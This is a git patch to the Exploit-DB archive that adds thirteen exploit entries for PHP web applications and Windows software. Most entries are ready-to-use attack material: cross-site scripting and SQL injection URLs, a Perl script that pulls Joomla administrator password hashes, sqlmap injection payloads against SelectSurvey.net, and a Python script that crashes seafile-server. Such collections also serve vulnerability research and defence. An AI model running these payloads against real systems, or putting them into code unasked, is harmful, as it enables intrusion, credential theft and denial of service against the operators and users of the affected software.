From 20e5929d701acd1425605b45d8389d067d86654b Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 22 Sep 2014 04:45:04 +0000
Subject: [PATCH] Updated 09_22_2014

---
 files.csv                       | 13 ++++++
 platforms/php/webapps/34707.txt |  8 ++++
 platforms/php/webapps/34708.pl  | 42 +++++++++++++++++++
 platforms/php/webapps/34709.txt |  9 +++++
 platforms/php/webapps/34710.txt | 11 +++++
 platforms/php/webapps/34711.txt |  9 +++++
 platforms/php/webapps/34712.txt |  9 +++++
 platforms/php/webapps/34713.txt |  9 +++++
 platforms/php/webapps/34714.txt |  9 +++++
 platforms/php/webapps/34715.txt |  9 +++++
 platforms/php/webapps/34721.txt | 21 ++++++++++
 platforms/php/webapps/34722.txt | 71 +++++++++++++++++++++++++++++++++
 platforms/windows/dos/34698.txt |  7 ++++
 platforms/windows/dos/34729.py  | 27 +++++++++++++
 14 files changed, 254 insertions(+)
 create mode 100755 platforms/php/webapps/34707.txt
 create mode 100755 platforms/php/webapps/34708.pl
 create mode 100755 platforms/php/webapps/34709.txt
 create mode 100755 platforms/php/webapps/34710.txt
 create mode 100755 platforms/php/webapps/34711.txt
 create mode 100755 platforms/php/webapps/34712.txt
 create mode 100755 platforms/php/webapps/34713.txt
 create mode 100755 platforms/php/webapps/34714.txt
 create mode 100755 platforms/php/webapps/34715.txt
 create mode 100755 platforms/php/webapps/34721.txt
 create mode 100755 platforms/php/webapps/34722.txt
 create mode 100755 platforms/windows/dos/34698.txt
 create mode 100755 platforms/windows/dos/34729.py

diff --git a/files.csv b/files.csv
index 4e5b8711e..2bc3d3c41 100755
--- a/files.csv
+++ b/files.csv
@@ -31241,6 +31241,7 @@ id,file,description,date,author,platform,type,port
 34695,platforms/windows/remote/34695.c,"GreenBrowser 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-22,anT!-Tr0J4n,windows,remote,0
 34696,platforms/windows/remote/34696.c,"Easy Office Recovery 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-22,anT!-Tr0J4n,windows,remote,0
 34697,platforms/windows/remote/34697.c,"Sothink SWF Decompiler 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-22,anT!-Tr0J4n,windows,remote,0
+34698,platforms/windows/dos/34698.txt,"Microsoft Excel 2002 - Memory Corruption Vulnerability",2010-09-23,Abysssec,windows,dos,0
 34699,platforms/php/webapps/34699.txt,"OpenText LiveLink 9.7.1 Multiple Cross Site Scripting Vulnerabilities",2010-09-23,"Alejandro Ramos",php,webapps,0
 34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s 'index.php' Local File Include and Cross Site Scripting Vulnerabilities",2009-07-24,u.f.,php,webapps,0
 34701,platforms/php/webapps/34701.txt,"SkaLinks 1.5 'cat' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-07-24,Moudi,php,webapps,0
@@ -31249,3 +31250,15 @@ id,file,description,date,author,platform,type,port
 34704,platforms/php/webapps/34704.txt,"MyDLstore Pixel Ad Script 'payment.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
 34705,platforms/php/webapps/34705.txt,"APBook 1.3 Admin Login Multiple SQL Injection Vulnerabilities",2009-07-21,n3w7u,php,webapps,0
 34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 'url' Parameter Remote File Include Vulnerability",2009-07-21,Moudi,php,webapps,0
+34707,platforms/php/webapps/34707.txt,"RadAFFILIATE Links 'index.php' Cross Site Scripting Vulnerability",2009-08-17,Moudi,php,webapps,0
+34708,platforms/php/webapps/34708.pl,"Joomla! 'com_tax' Component 'eid' Parameter SQL Injection Vulnerability",2010-09-23,FL0RiX,php,webapps,0
+34709,platforms/php/webapps/34709.txt,"Astrology 'celebrities.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34710,platforms/php/webapps/34710.txt,"Paypal Shopping Cart Script index.php Multiple Parameter XSS",2009-08-21,"599eme Man",php,webapps,0
+34711,platforms/php/webapps/34711.txt,"Paypal Shopping Cart Script index.php cid Parameter SQL Injection",2009-08-21,"599eme Man",php,webapps,0
+34712,platforms/php/webapps/34712.txt,"FreeWebScriptz HUBScript 'single_winner1.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0
+34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0
+34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
+34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0
+34729,platforms/windows/dos/34729.py,"Seafile-server <= 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0
diff --git a/platforms/php/webapps/34707.txt b/platforms/php/webapps/34707.txt
new file mode 100755
index 000000000..30adcb1cf
--- /dev/null
+++ b/platforms/php/webapps/34707.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/43459/info
+
+RadAFFILIATE Links is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/links_style1/?id_category=1&feat=1%00"&#039;><ScRiPt%20%0a%0d>alert(310243950025)%3B</ScRiPt>
+http://www.example.com/links_style1/index.php?id_category=0&feat=1>"><ScRiPt %0A%0D>alert(325194346916)%3B</ScRiPt>
diff --git a/platforms/php/webapps/34708.pl b/platforms/php/webapps/34708.pl
new file mode 100755
index 000000000..978070a18
--- /dev/null
+++ b/platforms/php/webapps/34708.pl
@@ -0,0 +1,42 @@
+source: http://www.securityfocus.com/bid/43461/info
+
+The 'com_tax' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+#!/usr/bin/perl -w
+
+########################################
+#[~] Author : Fl0riX
+#[!] Greetz: Sakkure And All My Friends
+#[!] Script_Name: Joomla Com_tax
+#[!] Exaple: >>> perl exploit.pl
+             >>> http://site.com
+########################################
+
+print "\t\t                                                             \n\n";
+print "\t\t| Fl0rix | Bug Researchers";
+print "\t\t                                                             \n\n";
+print "\t\t| Greetz: Sakkure And All My Friends";
+print "\t\t                                                             \n\n";
+print "\t\t|Joomla com_tax Remote SQL Inj. Exploit|\n\n";
+print "\t\t                                                             \n\n";
+use LWP::UserAgent;
+print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
+chomp(my $target=<STDIN>);
+$florix="concat(username,0x3a,password)";
+$sakkure="jos_users";
+$un="+UNION+SELECT+";
+$com="com_tax&task=fullevent";
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$host = $target . "/index.php?option=".$com."&eid=null".$un."1,".$florix.",3,4,5,6+from+".$sakkure."+--+";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
+print "\n[+] Admin Hash : $1\n\n";
+print "# Baba Buyuksun bea Bu is bu kadar xD #\n\n";
+}
+else{print "\n[-] Malesef Olmadi Aga bir dahaki sefere\n";
+}
+
+ 		 	   		  
diff --git a/platforms/php/webapps/34709.txt b/platforms/php/webapps/34709.txt
new file mode 100755
index 000000000..89e281c0a
--- /dev/null
+++ b/platforms/php/webapps/34709.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43470/info
+
+Astrology is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/demo/astrology/celebrities.php?month=01&day=1<ScRiPt %0A%0D>alert(309147116220)%3B</ScRiPt>
+http://www.example.com/celebrities.php?month=01&day=1<ScRiPt %0A%0D>alert(309147116220)%3B</ScRiPt>
+
diff --git a/platforms/php/webapps/34710.txt b/platforms/php/webapps/34710.txt
new file mode 100755
index 000000000..fcdb5bd88
--- /dev/null
+++ b/platforms/php/webapps/34710.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43471/info
+
+Paypal Shopping Cart Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/paypalshopping/index.php?cid="><script>alert(document.cookie);</script>
+
+http://www.example.com/paypalshopping/index.php?txtkeywords=%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&cmdSearch=Search
+
+
diff --git a/platforms/php/webapps/34711.txt b/platforms/php/webapps/34711.txt
new file mode 100755
index 000000000..d6ecfebc7
--- /dev/null
+++ b/platforms/php/webapps/34711.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43471/info
+ 
+Paypal Shopping Cart Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+http://www.example.com/paypalshopping/index.php?cid=7%20union%20all%20select%201,2,3,version(),5,6,7--
+
+http://www.example.com/paypalshopping/index.php?cid=1%20AND%201=null+union+select+1,2,3,version(),5,6,7--
diff --git a/platforms/php/webapps/34712.txt b/platforms/php/webapps/34712.txt
new file mode 100755
index 000000000..c273e7b01
--- /dev/null
+++ b/platforms/php/webapps/34712.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43474/info
+
+HUBScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+FreeWebScriptz HUBScript V1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/hubscript/demo/single_winner1.php?bid_id= XSS TO ADD: 1<script>alert(412798982398)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/34713.txt b/platforms/php/webapps/34713.txt
new file mode 100755
index 000000000..1fa7ddffe
--- /dev/null
+++ b/platforms/php/webapps/34713.txt
@@ -0,0 +1,9 @@
+source:  http://www.securityfocus.com/bid/43475/info
+
+FreeWebScriptz Freelancer Script is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FreeWebScriptz Freelancer Script 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/script/freelancer/placebid.php?id= ADD THIS XSS: 1<script>alert(364298092082)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/34714.txt b/platforms/php/webapps/34714.txt
new file mode 100755
index 000000000..d024b0fac
--- /dev/null
+++ b/platforms/php/webapps/34714.txt
@@ -0,0 +1,9 @@
+source:  http://www.securityfocus.com/bid/43475/info
+ 
+FreeWebScriptz Freelancer Script is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ 
+FreeWebScriptz Freelancer Script 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/script/freelancer/post_resume.php?jobid= ADD THIS XSS: 1<script>alert(372848775668)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/34715.txt b/platforms/php/webapps/34715.txt
new file mode 100755
index 000000000..2687db874
--- /dev/null
+++ b/platforms/php/webapps/34715.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43477/info
+
+AdQuick is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+AdQuick 2.2.1 is vulnerable; others versions may be affected.
+
+http://www.example.com/account.php?smw&red_url=1>"><ScRiPt %0A%0D>alert(322094267678)%3B</ScRiPt>
\ No newline at end of file
diff --git a/platforms/php/webapps/34721.txt b/platforms/php/webapps/34721.txt
new file mode 100755
index 000000000..2cc843bbd
--- /dev/null
+++ b/platforms/php/webapps/34721.txt
@@ -0,0 +1,21 @@
+Title : Stored XSS in Livefyre LiveComments Plugin
+CVE : 2014-6420
+Vendor Homepage : http://livefyre.com
+Software Link : http://web.livefyre.com/streamhub/#liveComments
+Version : v3.0
+Author : Brij Kishore Mishra
+Date : 03-Sept-2014
+Tested On : Chrome 37, Ubuntu 14.04
+
+
+Description :
+
+This plugin requires user to be signed in via livefyre account to post
+comments. Users have the option to upload pictures in comments. This
+feature can be easily abused.
+
+Using an intercepting proxy (e.g. Burp Suite), the name variable can be
+edited to send an XSS payload while uploading a picture (payload used :
+"><img src=x onerror=prompt(1337)>). When the comment is posted, the image
+will be successfully uploaded, which leads to XSS due to an unsanitized
+field.
diff --git a/platforms/php/webapps/34722.txt b/platforms/php/webapps/34722.txt
new file mode 100755
index 000000000..2947e4ddf
--- /dev/null
+++ b/platforms/php/webapps/34722.txt
@@ -0,0 +1,71 @@
+##########
+# Exploit Title: Multiple SQL Injection Vulnerabilities in SelectSurvey.net
+# Google Dork: intitle:SelectSurvey
+# Date: Sep 03 2014
+# Vendor Homepage: https://www.classapps.com/
+# Software Link: https://www.classapps.com/SelectSurveyNETOverview.asp
+# Version: 4.124.004
+# Tested on: Windows 2008 R2/SQL Server 2008
+# CVE: 2014-6030
+##########
+
+Description
+==========
+SelectSurvey.net is a web-based survey application written in ASP.net
+and C#. It is vulnerable to multiple SQL injection attacks, both
+authenticated and unauthenticated. The authenticated vulnerability
+resides within the file upload script, as the parameters are not
+sanitized prior to being placed into the SQL query. ClassApps had
+previously listed 'SQL injection protection' as a feature and did have
+several functions in place to attempt to prevent such attacks but due to
+using a "blacklisting" approach, it is possible to circumvent these
+functions. These functions are used elsewhere throughout the application
+to protect GET request variables but are not sufficient. Only this
+specific version of the application has been tested but it is highly
+likely these vulnerabilities exist within prior versions. It has not
+been confirmed that these vulnerabilities are fixed. The vendor stated
+that they would be fixed in this new release however, they do not allow
+download of the code unless you are a customer so fixes have not been
+verified.
+
+Vulnerabilities
+==========
+Unauthenticated:
+http[s]://<host>/survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi]
+
+Authenticated:
+http[s]://<host>/survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi]
+
+sqlmap identified the following injection points:
+---
+Place: GET
+Parameter: SurveyID
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur
+
+    Type: stacked queries
+    Title: Microsoft SQL Server/Sybase stacked queries
+    Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'--
+
+    Type: AND/OR time-based blind
+    Title: Microsoft SQL Server/Sybase time-based blind
+    Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'--
+---
+[14:01:39] [INFO] testing Microsoft SQL Server
+[14:01:39] [INFO] confirming Microsoft SQL Server
+[14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server
+[14:01:39] [INFO] fetching banner
+web server operating system: Windows 2008 R2 or 7
+web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
+back-end DBMS operating system: Windows 7 Service Pack 1
+back-end DBMS: Microsoft SQL Server 2008
+banner:
+---
+Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
+    Jun 28 2012 08:36:30
+    Copyright (c) Microsoft Corporation
+    Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601:
+Service Pack 1)
+---
+
diff --git a/platforms/windows/dos/34698.txt b/platforms/windows/dos/34698.txt
new file mode 100755
index 000000000..c8dac5b00
--- /dev/null
+++ b/platforms/windows/dos/34698.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43419/info
+
+Microsoft Excel is prone to a memory-corruption vulnerability.
+
+An attacker could exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in denial-of-service conditions. 
+
+http://www.exploit-db.com/sploits/34698.rar
\ No newline at end of file
diff --git a/platforms/windows/dos/34729.py b/platforms/windows/dos/34729.py
new file mode 100755
index 000000000..7078e7ac7
--- /dev/null
+++ b/platforms/windows/dos/34729.py
@@ -0,0 +1,27 @@
+# Exploit Title: ccnet-server remote DoS (assert) seafile-server <= 3.1.5 
+# Date: Sep 4, 2014
+# Exploit Author: retset
+# Vendor Homepage: seafile.com
+# Software Link: https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.4_win32.tar.gz
+# Version: seafile-server 3.1.4
+# Tested on: Windows 7/seafile-server 3.1.5
+
+import socket
+import sys
+
+
+ip = sys.argv[1]
+addr = (ip, 10001)
+s = socket.create_connection(addr)
+
+dos = '\x00\x04\x00\x00\x00\x00\x03\xe8'
+dos += '\x00' * 1001 
+
+s.send(dos)
+print repr(s.recv(1024))
+
+
+s.close()
+
+
+#@retset